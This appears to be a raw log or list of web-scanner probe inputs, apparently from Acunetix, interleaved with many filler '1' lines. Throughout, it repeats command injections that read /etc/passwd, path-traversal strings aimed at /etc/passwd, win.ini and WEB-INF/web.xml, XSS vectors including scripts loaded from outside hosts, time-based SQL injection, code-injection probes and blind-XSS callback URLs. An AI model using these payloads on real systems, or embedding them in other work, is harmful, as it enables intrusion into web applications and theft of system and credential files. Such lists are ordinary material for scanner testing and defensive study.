`cat /etc/passwd`

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

-1

1<ScRiPt%20>prompt(963650)</sCripT>

1

../../../../../../../../../../etc/passwd.jpg

|cat /etc/passwd#

1

1

1

-1)

1

1&lt

${99119+100141}

'|'ld

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1))

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

\xf6<img acu onmouseover=prompt(916047) //\xf6>

1

"|"ld

1&n911815=v925507

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

rOiRCbGy'

1some_inexistent_file_with_long_name%00.jpg

1

1<input autofocus onfocus=prompt(943338)>

)

1

1

QzdCYu8G')

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

<a href='http://www.acunetix.com'>website security</a>

!(()&&!|*|*|

1

'

GWlumaXs'))

'

testasp.vulnweb.com

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

[url=http://www.acunetix.com]website security[/url]

^(#$!@#$)(()))******

1

1

"

-1

1

"

/etc/passwd

1

1_PJkHD <ScRiPt >prompt(949553)</ScRiPt>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

-1)

||cat /etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

-1))

&dir

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://hitaebiJn55Ha.bxss.me/

EA50csls'

1

'&dir&'

1

1

acunetix_wvs_invalid_filename

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

IJk39s1p')

1

1

"&dir&"

http://www.acunetix.tst

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

zchenl9w'))

'"

|dir

comments

1

1

1'"()&%<ScRiPt >prompt(992706)</ScRiPt>

1

file:///etc/passwd

1

1

'|dir

<!--

comments/.

1

1

'"()&%<ScRiPt >prompt(906832)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

"|dir

1

1

1

1_922673

1

WEB-INF/web.xml

1

1

1

1

WEB-INF\web.xml

1

acu2493\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2493

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

acux1228\xc0\xbez1\xc0\xbcz2a\x90bcxuca1228

1

1<ScRiPt >prompt(921418)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1

1<script>prompt(967140)</script>

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(969506)</ScRiPt>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?969526></ScRiPt>

1

................windowswin.ini

1

1

1<ScRiPt >prompt(995963)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<video><source onerror="javascript:prompt(980463)">

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(943907)"></g></svg>

1

1

1<div style=width:expression(prompt(971941))>

response.write(9839004*9267614)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<iframe src='data:text/html

'+response.write(9839004*9267614)+'

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

&cat /etc/passwd&

"+response.write(9839004*9267614)+"

1<body onload=prompt(967939)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(914206)>

../../../../../../../../../../etc/passwd

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

WEB-INF/web.xml

1

"&cat /etc/passwd&"

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(976598)>

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

WEB-INF\web.xml

1

cat /etc/passwd

1

../../../../../../../../../../etc/passwd.jpg

1

1<img/src=">" onerror=alert(903372)>

-1

1

1

${99292+100396}

`cat /etc/passwd`

1

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<ScRiPt%20>prompt(928667)</sCripT>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1&n983238=v947727

1

|cat /etc/passwd#

1

-1))

1some_inexistent_file_with_long_name%00.jpg

1&lt

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

)

1

'|'ld

OvpBB7c2'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

\xf6<img acu onmouseover=prompt(973218) //\xf6>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

!(()&&!|*|*|

"|"ld

txXgYsJm')

testasp.vulnweb.com

1

1<input autofocus onfocus=prompt(948983)>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

'

^(#$!@#$)(()))******

1

1

XOo8BJv9'))

<a href='http://www.acunetix.com'>website security</a>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

1

"

-1

1

1

1

'

[url=http://www.acunetix.com]website security[/url]

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

"

${@print(md5(acunetix_wvs_security_test))}

-1)

1

1

1

1_3Qw6O <ScRiPt >prompt(996894)</ScRiPt>

1

http://hitjZW4JnKrif.bxss.me/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

-1))

1

1

1

acunetix_wvs_invalid_filename

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

b7VmkRK5'

1

&dir

1

comments

1

1

http://www.acunetix.tst

1

p5yjIOlh')

1

'"

comments

1

1

file:///etc/passwd

1'"()&%<ScRiPt >prompt(937027)</ScRiPt>

1

g3j1ELRR'))

'&dir&'

comments/.

<!--

1

1

'"()&%<ScRiPt >prompt(970844)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1

1

"&dir&"

1

1

1_999803

1

1

WEB-INF/web.xml

|dir

1

1

1

'|dir

WEB-INF\web.xml

1

"|dir

../../../../../../../../../../windows/win.ini

acu2027\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2027

1

1

../../../../../../../../../../boot.ini

1

1

1

acux3998\xc0\xbez1\xc0\xbcz2a\x90bcxuca3998

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(912450)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<script>prompt(973765)</script>

1

................windowswin.ini

1

1

1<ScRiPt >prompt(998526)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?969006></ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(919113)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(958404)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(939647)"></g></svg>

response.write(9150351*9699256)

1

1

1

&cat /etc/passwd&

1<div style=width:expression(prompt(920633))>

'+response.write(9150351*9699256)+'

1

WEB-INF/web.xml

1<iframe src='data:text/html

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

"+response.write(9150351*9699256)+"

../../../../../../../../../../etc/passwd

1

1<body onload=prompt(954838)>

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(960118)>

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1

1<img src=xyz OnErRor=prompt(938744)>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

1

`cat /etc/passwd`

-1

1<img/src=">" onerror=alert(997587)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

1

|cat /etc/passwd#

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt%20>prompt(978301)</sCripT>

-1)

1

1

${100405+100334}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

'|'ld

1&lt

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1))

1

1&n931816=v932337

1

1some_inexistent_file_with_long_name%00.jpg

1

\xf6<img acu onmouseover=prompt(904637) //\xf6>

1

5o7U5umd'

"|"ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<input autofocus onfocus=prompt(913811)>

tdnyLMgp')

1

1

/etc/passwd

!(()&&!|*|*|

testasp.vulnweb.com

'"()

<a href='http://www.acunetix.com'>website security</a>

'

WJMvbUR6'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

^(#$!@#$)(()))******

'

1

1

[url=http://www.acunetix.com]website security[/url]

"

-1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1_7yWo1 <ScRiPt >prompt(940942)</ScRiPt>

${@print(md5(acunetix_wvs_security_test))}

-1)

||cat /etc/passwd

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

-1))

1

&dir

http://hitMyGLlU49Uv.bxss.me/

1

acunetix_wvs_invalid_filename

1

1

xpkTH7cG'

1

file:///etc/passwd

1

1

1

'&dir&'

comments

1

/\../\../\../\../\../\../\../etc/passwd

l9A5BfnK')

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

http://www.acunetix.tst

comments

'"

"&dir&"

WEB-INF/web.xml

pn2XBG2X'))

1

1

1'"()&%<ScRiPt >prompt(965179)</ScRiPt>

1

<!--

comments/.

WEB-INF\web.xml

|dir

1

1

1

1

1

1

'"()&%<ScRiPt >prompt(979573)</ScRiPt>

../../../../../../../../../../windows/win.ini

'|dir

1

1

1

1

1

../../../../../../../../../../boot.ini

1_946381

1

1

"|dir

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

acu3406\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3406

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

acux2056\xc0\xbez1\xc0\xbcz2a\x90bcxuca2056

1

1

................windowswin.ini

1<ScRiPt >prompt(940854)</ScRiPt>

1

1

1<script>prompt(910404)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(918950)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?978616></ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt >prompt(972180)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(935091)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(943054)"></g></svg>

1

1<div style=width:expression(prompt(925635))>

1

1

1

response.write(9912149*9212313)

WEB-INF/web.xml

1

1<iframe src='data:text/html

'+response.write(9912149*9212313)+'

1

&cat /etc/passwd&

1<body onload=prompt(942171)>

WEB-INF\web.xml

1

1

'&cat /etc/passwd&'

"+response.write(9912149*9212313)+"

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(948802)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

1

1

1<img src=xyz OnErRor=prompt(921883)>

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

cat /etc/passwd

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<img/src=">" onerror=alert(916243)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

-1

1

../../../../../../../../../../etc/passwd.jpg

`cat /etc/passwd`

1<ScRiPt%20>prompt(907274)</sCripT>

1

${99478+99656}

1

1

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

|cat /etc/passwd#

1&lt

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1))

1

1

1some_inexistent_file_with_long_name%00.jpg

1

1&n965201=v966589

1

'|'ld

\xf6<img acu onmouseover=prompt(902934) //\xf6>

Igu1LU8d'

)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<input autofocus onfocus=prompt(944951)>

1

1

1

"|"ld

F8uYzKUR')

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

<a href='http://www.acunetix.com'>website security</a>

1

1

oVakpkr8'))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

'"()

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

[url=http://www.acunetix.com]website security[/url]

'

'

1

-1

1

/etc/passwd

1

1

1

-1)

1_f1CPN <ScRiPt >prompt(956178)</ScRiPt>

"

1

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

-1))

||cat /etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://hitup0JuuVpEx.bxss.me/

1

1

acunetix_wvs_invalid_filename

1

k5sVOeZB'

&dir

1

${@print(md5(acunetix_wvs_security_test))}\

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

xrhrqDZ5')

'&dir&'

1

comments

http://www.acunetix.tst

1

1

1

'"

MGqlnYg8'))

1'"()&%<ScRiPt >prompt(936585)</ScRiPt>

"&dir&"

comments

1

1

file:///etc/passwd

1

<!--

1

1

comments/.

'"()&%<ScRiPt >prompt(910525)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

|dir

1

1

1

1_970305

1

1

1

1

WEB-INF/web.xml

'|dir

acu2064\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2064

WEB-INF\web.xml

1

"|dir

1

1

acux9836\xc0\xbez1\xc0\xbcz2a\x90bcxuca9836

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

1<ScRiPt >prompt(985602)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1<script>prompt(959668)</script>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(913916)</ScRiPt>

1

................windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?972903></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(977762)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<video><source onerror="javascript:prompt(983404)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(989910)"></g></svg>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<div style=width:expression(prompt(958697))>

1

1

response.write(9784906*9538300)

1

1<iframe src='data:text/html

1

'+response.write(9784906*9538300)+'

WEB-INF/web.xml

1

1<body onload=prompt(907260)>

1

1

"+response.write(9784906*9538300)+"

&cat /etc/passwd&

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(943239)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

1

1

1

'&cat /etc/passwd&'

1<img src=xyz OnErRor=prompt(991296)>

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1<img/src=">" onerror=alert(938128)>

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

${99283+99268}

1<ScRiPt%20>prompt(996757)</sCripT>

1

cat /etc/passwd

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1

1

1&n972207=v956152

1&lt

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

`cat /etc/passwd`

1

-1

1

)

1

\xf6<img acu onmouseover=prompt(926701) //\xf6>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1some_inexistent_file_with_long_name%00.jpg

|cat /etc/passwd#

1

-1)

1

!(()&&!|*|*|

1<input autofocus onfocus=prompt(915624)>

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

1

-1))

^(#$!@#$)(()))******

<a href='http://www.acunetix.com'>website security</a>

/etc/passwd

'"()

1

testasp.vulnweb.com

'

"|"ld

UmK9EzPL'

1

1

"

[url=http://www.acunetix.com]website security[/url]

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

6McsteQw')

${@print(md5(acunetix_wvs_security_test))}

1

1

1_CS3Th <ScRiPt >prompt(909214)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

02qwq7Wg'))

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

-1

"

acunetix_wvs_invalid_filename

http://hituA0MsTb1pk.bxss.me/

1

1

1

1

1

-1)

comments

||cat /etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

file:///etc/passwd

1

&dir

http://www.acunetix.tst

comments

-1))

1

1

/\../\../\../\../\../\../\../etc/passwd

1

'"

1'"()&%<ScRiPt >prompt(910879)</ScRiPt>

'&dir&'

comments/.

1

1

9c3Ik1pv'

WEB-INF/web.xml

1

<!--

'"()&%<ScRiPt >prompt(927399)</ScRiPt>

1

"&dir&"

1

1

nNBde2jX')

WEB-INF\web.xml

1

1_964402

1

1

|dir

1

krIv7pDe'))

../../../../../../../../../../windows/win.ini

1

1

1

'|dir

1

../../../../../../../../../../boot.ini

acu7739\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7739

"|dir

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acux3116\xc0\xbez1\xc0\xbcz2a\x90bcxuca3116

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(953405)</ScRiPt>

1

1

................windowswin.ini

1

..\..\..\..\..\..\..\..\windows\win.ini

1<script>prompt(937439)</script>

1

1

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(912627)</ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?944240></ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt >prompt(922820)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(946594)">

1

1

WEB-INF/web.xml

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(906328)"></g></svg>

1

1<div style=width:expression(prompt(981841))>

response.write(9801353*9263219)

WEB-INF\web.xml

1

1

1

'+response.write(9801353*9263219)+'

1<iframe src='data:text/html

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1

1

../../../../../../../../../../etc/passwd

"+response.write(9801353*9263219)+"

1<body onload=prompt(928991)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'&cat /etc/passwd&'

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(916227)>

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd.jpg

1

${99610+99730}

1

1<img src=xyz OnErRor=prompt(924180)>

1

1

cat /etc/passwd

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

`cat /etc/passwd`

1

1<img/src=">" onerror=alert(959238)>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1

1&n948464=v969599

1

1<ScRiPt%20>prompt(928110)</sCripT>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

)

1

1&lt

-1)

testasp.vulnweb.com

"|"ld

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

!(()&&!|*|*|

1

\xf6<img acu onmouseover=prompt(928670) //\xf6>

'"()

-1))

1

/etc/passwd

1

'

1

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(923635)>

1

'

9svG4DDu'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

"

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

<a href='http://www.acunetix.com'>website security</a>

1

Uk740LA2')

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

[url=http://www.acunetix.com]website security[/url]

||cat /etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1

1

6c3wGfKN'))

1_Hw1pM <ScRiPt >prompt(942687)</ScRiPt>

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}\

http://hit9dKS4LVJ0m.bxss.me/

&dir

-1

1

acunetix_wvs_invalid_filename

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

-1)

'&dir&'

1

1

1

comments

1

-1))

file:///etc/passwd

1

1

http://www.acunetix.tst

"&dir&"

'"

comments

1

HVYtRXbM'

/\../\../\../\../\../\../\../etc/passwd

1

1'"()&%<ScRiPt >prompt(912725)</ScRiPt>

|dir

<!--

'"()&%<ScRiPt >prompt(924392)</ScRiPt>

1

comments/.

hl3A8u6M')

1

1

WEB-INF/web.xml

'|dir

1

szmnYJ0d'))

1_977668

1

1

1

WEB-INF\web.xml

"|dir

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

acu2521\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2521

1

../../../../../../../../../../boot.ini

1

1

1

acux4296\xc0\xbez1\xc0\xbcz2a\x90bcxuca4296

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(925494)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

................windowswin.ini

1<script>prompt(952147)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(932977)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?915930></ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(912807)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<video><source onerror="javascript:prompt(923038)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(929631)"></g></svg>

1

WEB-INF/web.xml

1

1

1<div style=width:expression(prompt(957957))>

1

response.write(9393487*9757303)

WEB-INF\web.xml

1

1

1

1<iframe src='data:text/html

&cat /etc/passwd&

'+response.write(9393487*9757303)+'

1

1

../../../../../../../../../../etc/passwd

1

1

1<body onload=prompt(965456)>

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

"+response.write(9393487*9757303)+"

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(933326)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

